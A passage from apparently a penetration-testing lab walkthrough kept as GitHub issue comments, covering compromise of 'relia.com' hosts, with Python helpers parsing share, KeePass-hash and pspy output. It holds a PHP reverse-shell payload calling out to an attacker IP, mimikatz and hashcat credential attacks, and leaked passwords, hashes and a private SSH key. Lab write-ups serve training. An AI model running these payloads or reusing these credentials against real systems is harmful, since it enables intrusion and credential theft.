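        if lm:
            logins.append({"host": m["host"], "ip": m["ip"], "domain": lm["domain"],
                           "user": lm["user"], "password": lm["password"],
                           "admin": lm["admin"] is not None})
            continue
        if rest.startswith(("[", "Share ", "-----")):   # [*] banner lines, table header
            continue
        sm = SHARE_RE.match(rest)
        if sm:
            entry["shares"].append({"name": sm["share"], "perms": sm["perms"] or "",
                                    "remark": sm["remark"]})
    return hosts, logins


def _with_perm(hosts, perm):
    out = {}
    for host, info in hosts.items():
        names = [s["name"] for s in info["shares"]
                 if perm in s["perms"] and s["name"] not in DEFAULT_SHARES]
        if names:
            out[host] = names
    return out


def readable_nondefault(hosts):
    """Custom shares we can read: the ones to mirror with smbclient first."""
    return _with_perm(hosts, "READ")


def writable(hosts):
    """Custom shares we can write to: candidates for dropping files other users will run."""
    return _with_perm(hosts, "WRITE")


def smbclient_cmds(hosts, domain, user, password, proxy="proxychains -q "):
    """One recursive-download command per readable custom share, in the style used above."""
    cmds = []
    for host, names in readable_nondefault(hosts).items():
        ip = hosts[host]["ip"]
        for name in names:
            cmds.append(f"{proxy}smbclient '//{ip}/{name}' -c 'prompt OFF;recurse ON;mget *' "
                        f"-U '{domain}/{user}%{password}'")
    return cmds


if __name__ == "__main__":
    hosts, logins = parse_cme_output(SAMPLE)
    print("readable:", readable_nondefault(hosts))
    print("writable:", writable(hosts))
    print("admin logins:", [(l["host"], l["user"]) for l in logins if l["admin"]])
    print("\n".join(smbclient_cmds(hosts, "relia.com", "jim", "Castello1!")))
```

`NETLOGON` and `SYSVOL` are filtered as defaults here, but on a domain controller they still deserve a manual look: logon scripts and Group Policy files live there and can carry their own credentials. Run the real sweep as `... --shares | tee shares.txt` and pass the file contents to `parse_cme_output`.
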

WDavid404 commented 8 months ago

172.16.129.15

sudo proxychains -q xfreerdp /d:'relia.com' /u:Administrator /p:vau\!XCKjNQBv2\$ /v:172.16.129.15 /cert-ignore /w:1200 /h:800 /compression /auto-reconnect /drive:.,kali-share +clipboard ---> Succeeded ---> found local.txt and proof.txt

And we also found a Database.kdbx file:

keepass2john Database.kdbx > keepass.hash

Remove 'Database:' from keepass.hash, then:

hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force
---> password: destiny1 ---> Got info from the kdbx file:

BACKUP Machine SSH Key
username: sarah 

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACBEhRgOw+Adwr6+R/A54Ng75WK1VsH1f+xloYwIbFnoAwAAAJgtoEZgLaBG
YAAAAAtzc2gtZWQyNTUxOQAAACBEhRgOw+Adwr6+R/A54Ng75WK1VsH1f+xloYwIbFnoAw
AAAECk3NMSFKJMauIwp/DPYEhMV4980aMdDOlfIlTq3qy4SkSFGA7D4B3Cvr5H8Dng2Dvl
YrVWwfV/7GWhjAhsWegDAAAADnRlc3RzQGhhdC13b3JrAQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----

Try mimikatz:

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords --->

mimikatz # token::elevate
mimikatz # lsadump::sam ---> No more info

172.16.x.6

sudo proxychains -q xfreerdp /d:'relia.com' /u:Administrator /p:vau\!XCKjNQBv2\$ /v:172.16.136.6 /cert-ignore /w:1200 /h:800 /compression /auto-reconnect /drive:.,kali-share +clipboard ---> succeed.

Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue --> proof.txt but no local.txt

mimikatz.exe --> no new info

172.16.x.7

sudo proxychains -q xfreerdp /d:'relia.com' /u:Administrator /p:vau\!XCKjNQBv2\$ /v:172.16.136.7 /cert-ignore /w:1200 /h:800 /compression /auto-reconnect /drive:.,kali-share +clipboard --> got proof.txt and local.txt

mimikatz.exe --> andrea / ce3f12443651168b3793f5fbcccff9db / PasswordPassword_6

172.16.x.30

sudo proxychains -q xfreerdp /d:'relia.com' /u:Administrator /p:vau\!XCKjNQBv2\$ /v:172.16.136.30 /cert-ignore /w:1200 /h:800 /compression /auto-reconnect /drive:.,kali-share +clipboard ---> Proof.txt only

mimikatz --> No new info

172.16.x.21

RDP doesn't work since port 3389 is not open; winrm also doesn't work.

proxychains impacket-psexec relia/administrator:"vau\!XCKjNQBv2$"@172.16.136.21 ---> works! proof.txt only

mimikatz --> no new info.
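
Both KeePass databases on this page (the one on .14 and the one on 172.16.129.15) went through the same two steps: `keepass2john`, then stripping the `Database:` prefix by hand before `hashcat -m 13400`. As an added example (not part of this issue or the author's notes), the Python below does that normalisation and checks the line actually has the `$keepass$*<version>*<rounds>*<algo>*<hex fields...>` shape hashcat expects, so a truncated copy-paste fails here instead of as a silent "no hashes loaded". It also reports the transform round count, which is what makes KeePass cracking slow: every candidate password costs that many AES iterations. The sample line is constructed; only its layout matches real `keepass2john` output.

```python
import re

# Constructed keepass2john line: real seeds and hashes are random hex, the layout is the same.
SAMPLE_LINE = (
    "Database:$keepass$*2*60000*0*"
    + "aa" * 32 + "*" + "bb" * 32 + "*" + "cc" * 16 + "*" + "dd" * 32 + "*" + "ee" * 32
)

# <file>:  prefix is optional so already-cleaned lines parse too.
HEADER_RE = re.compile(
    r"^(?:(?P<name>[^:]*):)?"
    r"(?P<hash>\$keepass\$\*(?P<version>[12])\*(?P<rounds>\d+)\*(?P<algo>\d+)\*(?P<fields>.+))$"
)
# Remaining fields are hex blobs; a key-file variant appends small decimal fields as well.
FIELD_RE = re.compile(r"^(?:[0-9a-fA-F]+|\d+)$")


def parse_keepass2john_line(line):
    """Split one keepass2john line into its parts, raising ValueError if it is malformed."""
    m = HEADER_RE.match(line.strip())
    if not m:
        raise ValueError("not a keepass2john line")
    fields = m["fields"].split("*")
    bad = [f for f in fields if not FIELD_RE.match(f)]
    if bad:
        raise ValueError(f"non-hex field(s): {bad}")
    return {
        "name": m["name"],            # file name prefix, None if already stripped
        "hash": m["hash"],            # what hashcat wants, prefix removed
        "version": int(m["version"]),  # 1 = KDB, 2 = KDBX
        "rounds": int(m["rounds"]),    # key transform rounds: per-candidate cost
        "algo": int(m["algo"]),
        "fields": fields,
        "hashcat_mode": 13400,
    }


def to_hashcat(lines):
    """Prefix-free, de-duplicated hashes in input order; blank lines are ignored."""
    seen, out = set(), []
    for line in lines:
        if not line.strip():
            continue
        h = parse_keepass2john_line(line)["hash"]
        if h not in seen:
            seen.add(h)
            out.append(h)
    return out


def convert_file(src, dst):
    """Read keepass2john output from src and write a hashcat-ready file to dst."""
    with open(src) as f:
        hashes = to_hashcat(f.read().splitlines())
    with open(dst, "w") as f:
        f.write("\n".join(hashes) + "\n")
    return len(hashes)


def hashcat_command(hashfile, wordlist="/usr/share/wordlists/rockyou.txt",
                    rules="/usr/share/hashcat/rules/rockyou-30000.rule"):
    """The attack used on this page: rockyou with the rockyou-30000 rule set."""
    return f"hashcat -m 13400 {hashfile} {wordlist} -r {rules}"


if __name__ == "__main__":
    info = parse_keepass2john_line(SAMPLE_LINE)
    print(f'{info["name"]}: KDBX v{info["version"]}, {info["rounds"]} transform rounds')
    print(hashcat_command("keepass.hash"))
```

`rounds` is worth a glance before starting: 60000 rounds, as in the hash above, means each guess is 60000 AES operations, so rockyou with a 30000-rule set is a long run and a smaller rule set or a targeted list is the better first pass.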

WDavid404 commented 8 months ago

192.168.x.189

crackmapexec smb 192.168.246.189 -u Administrator -d relia.com -p vau\!XCKjNQBv2\$

SMB         192.168.246.189 445    MAIL             [*] Windows 10.0 Build 20348 x64 (name:MAIL) (domain:relia.com) (signing:False) (SMBv1:False)
SMB         192.168.246.189 445    MAIL             [+] relia.com\Administrator:vau!XCKjNQBv2$ (Pwn3d!)

impacket-psexec relia/administrator:"vau\!XCKjNQBv2$"@192.168.246.189 ---> login succeeded! Found proof.txt only

mimikatz --> no useful info

net user /domain

Administrator            andrea                   anna                     
brad                     dan                      Guest                    
iis_service              internaladmin            jenny                    
jim                      krbtgt                   larry                    
maildmz                  michelle                 milana                   
mountuser 

Add to the user list.

172.16.x.19

Because we found sarah's key on 172.16.129.15, we use it to ssh into host 19:
proxychains -q ssh -i sarah.key sarah@172.16.97.19 ---> succeeded. Got local.txt

$ sudo -l --->

Matching Defaults entries for sarah on backup:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User sarah may run the following commands on backup:
    (ALL) NOPASSWD: /usr/bin/borg list *
    (ALL) NOPASSWD: /usr/bin/borg extract *
    (ALL) NOPASSWD: /usr/bin/borg mount *

timeout 5m ./pspy64 --->

2024/04/07 03:56:18 CMD: UID=0     PID=7628   | /usr/bin/python3 /usr/bin/borg create /opt/borgbackup::usb_1712462178 /media/usb0 
2024/04/07 03:56:18 CMD: UID=0     PID=7627   | /bin/sh -c BORG_PASSPHRASE='xinyVzoH2AnJpRK9sfMgBA' borg create /opt/borgbackup::usb_1712462178 /media/usb0 
2024/04/07 03:56:18 CMD: UID=0     PID=7629   | /usr/bin/python3 /usr/bin/borg create /opt/borgbackup::usb_1712462178 /media/usb0 
2024/04/07 03:56:18 CMD: UID=0     PID=7630   | /usr/bin/python3 /usr/bin/borg create /opt/borgbackup::usb_1712462178 /media/usb0 
2024/04/07 03:56:19 CMD: UID=0     PID=7631   | sleep 15 
2024/04/07 03:56:34 CMD: UID=0     PID=7640   | /usr/bin/python3 /usr/bin/borg create /opt/borgbackup::usb_1712462194 /media/usb0 
2024/04/07 03:56:34 CMD: UID=0     PID=7639   | /bin/sh -c BORG_PASSPHRASE='xinyVzoH2AnJpRK9sfMgBA' borg create /opt/borgbackup::usb_1712462194 /media/usb0    ★★
2024/04/07 03:56:34 CMD: UID=0     PID=7641   | /usr/bin/python3 /usr/bin/borg create /opt/borgbackup::usb_1712462194 /media/usb0 

--> points:

Then, sudo /usr/bin/borg list /opt/borgbackup and enter the passphrase --->

home                                 Mon, 2022-10-17 22:29:47 [680a2deb3b958081ac2b5a28e9c0fa1735c0bd8eb7323cf0ffbb3579b4fd5d4d]
usb_1712467323                       Sun, 2024-04-07 05:22:03 [5fe9d1e6dd241249c1fe0c32c5d63694d592ed78f53ce6f934f9d3275fcc74a3]
usb_1712467338                       Sun, 2024-04-07 05:22:18 [a10f908e81c623fa8d6ecff63a93dc25f30826bf2b6c126419f0c67e31a1550f]
usb_1712467353                       Sun, 2024-04-07 05:22:34 [46e22f64839a7b844eaf671238759447a5913c8520e7b3d867ae41afa9f9f337]
....

sudo /usr/bin/borg extract --stdout /opt/borgbackup::home and enter the passphrase --->
amy / 0814b6b7f0de51ecf54ca5b6e6e612bf
andrew / Rb9kNokjDsjYyH / @172.16.6.20

sudo /usr/bin/borg extract --stdout /opt/borgbackup::usb_1712467837 ---> Archive usb_1712467323 does not exist, or no info

su amy ---> tried "0814b6b7f0de51ecf54ca5b6e6e612bf" as the password but FAILED. Maybe "0814b6b7f0de51ecf54ca5b6e6e612bf" is a hash; crack it using the website https://crackstation.net/ ---> amy / backups1

Switch to amy (su amy); found amy has root privileges ---> we can get proof.txt: sudo cat /root/proof.txt

172.16.x.20

proxychains -q nmap -sT -T4 172.16.136.20 --> 22 port

proxychains -q ssh andrew@172.16.89.20 (pass: Rb9kNokjDsjYyH) ---> Got local.txt

find / -perm -u=s -type f 2>/dev/null -->

/usr/local/bin/doasedit
/usr/local/bin/vidoas
/usr/local/bin/doas
/usr/bin/chpass
/usr/bin/atq
...

find / -name doas.conf -type f 2>/dev/null --> /usr/local/etc/doas.conf ---> permit nopass andrew as root cmd service args apache24 onestart

And, according to LinPEAS, '/usr/local/www/apache24/data/phpMyAdmin/tmp' is a writable dir for us.

'/usr/local/etc/apache24/httpd.conf' is conf for apache24 --> DocumentRoot "/usr/local/www/apache24/data"

So, put a reverse.php file under /usr/local/www/apache24/data/phpMyAdmin/tmp:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.180/4445 0>&1'");?>

/usr/local/bin/doas service apache24 onestart ---> [image]

[Kali] proxychains -q curl 172.16.105.20/phpMyAdmin/tmp/php_reverse_me.php ---> we get a reverse shell from 20 as the "wwww" user ---> got proof.txt

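The pspy capture on backup (.19) is the decisive step of that box: root's cron job runs `sh -c BORG_PASSPHRASE='...' borg create ...`, so the passphrase is part of the `sh` process's argv and readable by every local user through `/proc/<pid>/cmdline`, which is all pspy reads. As an added example (not part of this issue or the author's notes), the Python below parses pspy lines, pulls out `NAME=value` assignments whose name looks like a secret, and `--password=` style flags, and separates the ones that belong to root-run commands, since those are the ones that, combined with the `sudo borg` rules above, give access to root's archives. The borg lines in the sample are the ones shown above; the mysqldump and AWS lines are constructed to show the flag and double-quoted cases.

```python
import re

# Constructed pspy capture: the borg lines mirror the ones above; the last two
# lines are made up to exercise a --password= flag and a double-quoted assignment.
SAMPLE = """\
2024/04/07 03:56:18 CMD: UID=0     PID=7627   | /bin/sh -c BORG_PASSPHRASE='xinyVzoH2AnJpRK9sfMgBA' borg create /opt/borgbackup::usb_1712462178 /media/usb0 
2024/04/07 03:56:18 CMD: UID=0     PID=7628   | /usr/bin/python3 /usr/bin/borg create /opt/borgbackup::usb_1712462178 /media/usb0 
2024/04/07 03:56:19 CMD: UID=0     PID=7631   | sleep 15 
2024/04/07 03:57:00 CMD: UID=1001  PID=7702   | mysqldump --user=backup --password=constructedDbPass1 shop
2024/04/07 03:57:05 CMD: UID=0     PID=7710   | /bin/sh -c AWS_SECRET_ACCESS_KEY="constructed/aws+key" aws s3 sync /backup s3://bkt
"""

PSPY_RE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) CMD: UID=(?P<uid>\d+)\s+PID=(?P<pid>\d+)\s+\|\s(?P<cmd>.*)$"
)
# NAME=value where NAME contains PASS/SECRET/TOKEN/KEY; single-, double- or un-quoted value.
ENV_RE = re.compile(
    r"""\b(?P<name>[A-Z][A-Z0-9_]*(?:PASS|SECRET|TOKEN|KEY)[A-Z0-9_]*)=(?:'(?P<sq>[^']*)'|"(?P<dq>[^"]*)"|(?P<bare>\S+))"""
)
# --password=x / --password x and friends. Heuristic: a short flag list keeps false positives down.
FLAG_RE = re.compile(r"(?P<flag>--?(?:password|passwd|passphrase|token|secret))[= ](?P<val>\S+)")


def parse_pspy(text):
    """Turn pspy 'CMD:' lines into dicts; lines that are not command events are dropped."""
    events = []
    for line in text.splitlines():
        m = PSPY_RE.match(line.rstrip())
        if m:
            events.append({"ts": m["ts"], "uid": int(m["uid"]), "pid": int(m["pid"]), "cmd": m["cmd"]})
    return events


def find_leaked_secrets(events):
    """Every credential-looking argv fragment, tagged with the event it came from."""
    found = []
    for ev in events:
        for m in ENV_RE.finditer(ev["cmd"]):
            value = m["sq"] if m["sq"] is not None else m["dq"] if m["dq"] is not None else m["bare"]
            found.append({**ev, "kind": "env", "name": m["name"], "value": value})
        for m in FLAG_RE.finditer(ev["cmd"]):
            found.append({**ev, "kind": "flag", "name": m["flag"], "value": m["val"]})
    return found


def root_secrets(found):
    """Leaks from UID 0 processes: the ones that turn into privilege escalation."""
    return [s for s in found if s["uid"] == 0]


def unique_secrets(found):
    return sorted({(s["name"], s["value"]) for s in found})


if __name__ == "__main__":
    leaks = find_leaked_secrets(parse_pspy(SAMPLE))
    for s in leaks:
        who = "root" if s["uid"] == 0 else f"uid {s['uid']}"
        print(f'{s["ts"]} pid {s["pid"]} ({who}) {s["kind"]} {s["name"]} = {s["value"]}')
```

Run pspy with `-f` off and capture to a file (`./pspy64 | tee pspy.log`), then feed the log to `parse_pspy`. The defensive side of the same observation: the leak exists because the assignment is inside the string handed to `sh -c`, so it is argv; a variable exported from a root-owned script, or borg's `BORG_PASSCOMMAND`, lands in the process environment instead, and `/proc/<pid>/environ` is only readable by the process owner.
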
WDavid404 commented 7 months ago

Lesson